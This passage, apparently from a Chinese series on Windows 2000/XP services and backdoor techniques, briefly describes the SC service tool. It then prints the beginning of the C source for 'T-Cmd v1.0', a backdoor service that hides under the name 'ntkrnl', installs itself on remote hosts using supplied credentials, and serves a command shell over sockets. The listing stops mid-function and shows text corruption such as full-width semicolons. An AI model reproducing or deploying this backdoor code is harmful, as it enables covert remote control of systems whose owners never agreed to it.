Win2000/XP服务与后门技术(5)

六、附录

　　1.SC简介

　　SC是一个与NT服务控制器，服务进程进行通信的控制台程序，它可以查询和修改已安装服务的数据库。

　　语法：sc <server> [command] [service name] <option1> <option2>... ，选项<server>为“\\ServerName”的形式。

　　主要的命令包括：query,config,qc,delete,create,GetDisplayName,GetKeyName,EnumDepend等。

　　2.T-Cmd v1.0 源代码

#include <Windows.h>
#include <stdio.h>

#define BUFFER_SIZE 1024

typedef struct
{
HANDLE hPipe；
SOCKET sClIEnt；
}SESSIONDATA,*PSESSIONDATA；

typedef struct PROCESSDATA
{
HANDLE　　　　hProcess；
DWord　　　　 dwProcessId；
struct　　　　PROCESSDATA *next；
}PROCESSDATA,*PPROCESSDATA；

HANDLE　　　　　　　　hMutex；
PPROCESSDATA　　　　 lpProcessDataHead；
PPROCESSDATA　　　　 lpProcessDataEnd；
SERVICE_STATUS　　　　ServiceStatus；
SERVICE_STATUS_HANDLE ServiceStatusHandle；

void WINAPI CmdStart(DWORD,LPTSTR *)；
void WINAPI CmdControl(DWORD)；

DWORD WINAPI CmdService(LPVOID)；
DWORD WINAPI CmdShell(LPVOID)；
DWORD WINAPI ReadShell(LPVOID)；
DWORD WINAPI WriteShell(LPVOID)；

BOOL ConnectRemote(BOOL,char *,char *,char *)；
void InstallCmdService(char *)；
void RemoveCmdService(char *)；

void Start(void)；
void Usage(void)；

int main(int argc,char *argv[])
{
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{"ntkrnl",CmdStart},
{NULL　　,NULL　　}
}；

if(argc==5)
{
if(ConnectRemote(TRUE,argv[2],argv[3],argv[4])==FALSE)
{
return -1；
}

if(!stricmp(argv[1],"-install"))
{
InstallCmdService(argv[2])；
}
else if(!stricmp(argv[1],"-remove"))
{
RemoveCmdService(argv[2])；
}

if(ConnectRemote(FALSE,argv[2],argv[3],argv[4])==FALSE)
{
return -1；
}
return 0；
}
else if(argc==2)
{
if(!stricmp(argv[1],"-install"))
{
InstallCmdService(NULL)；
}
else if(!stricmp(argv[1],"-remove"))
{
RemoveCmdService(NULL)；
}
else
{
Start()；
Usage()；
}
return 0；
}

StartServiceCtrlDispatcher(DispatchTable)；

return 0；
}

void WINAPI CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
HANDLE　　hThread；

ServiceStatus.dwServiceType　　　　　　 = SERVICE_WIN32；
ServiceStatus.dwCurrentState　　　　　　= SERVICE_START_PENDING；
ServiceStatus.dwControlsAccepted　　　　= SERVICE_ACCEPT_STOP
　　　　　　　　　　　　　　　　　　│ SERVICE_ACCEPT_PAUSE_CONTINUE；
ServiceStatus.dwServiceSpecificExitCode = 0；
ServiceStatus.dwWin32ExitCode　　　　 = 0；
ServiceStatus.dwCheckPoint　　　　　　 = 0；
ServiceStatus.dwWaitHint　　　　　　　　= 0；

ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl)；
if(ServiceStatusHandle==0)
{
OutputDebugString("RegisterServiceCtrlHandler Error !\n")；
return ；
}

ServiceStatus.dwCurrentState = SERVICE_RUNNING；
ServiceStatus.dwCheckPoint = 0；
ServiceStatus.dwWaitHint　　 = 0；

if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
{
OutputDebugString("SetServiceStatus in CmdStart Error !\n")；
return ；
}

hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL)；
if(hThread==NULL)
{
OutputDebugString("CreateThread in CmdStart Error !\n")；
}

return ；
}

void WINAPI CmdControl(DWORD dwCode)
{
switch(dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED；
break；

case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING；
break；

case SERVICE_CONTROL_STOP:　　
WaitForSingleObject(hMutex,INFINITE)；
while(lpProcessDataHead!=NULL)
{
TerminateProcess(lpProcessDataHead->hProcess,1)；
if(lpProcessDataHead->next!=NULL)
{
lpProcessDataHead=lpProcessDataHead->next；
}
else
{
lpProcessDataHead=NULL；
}
}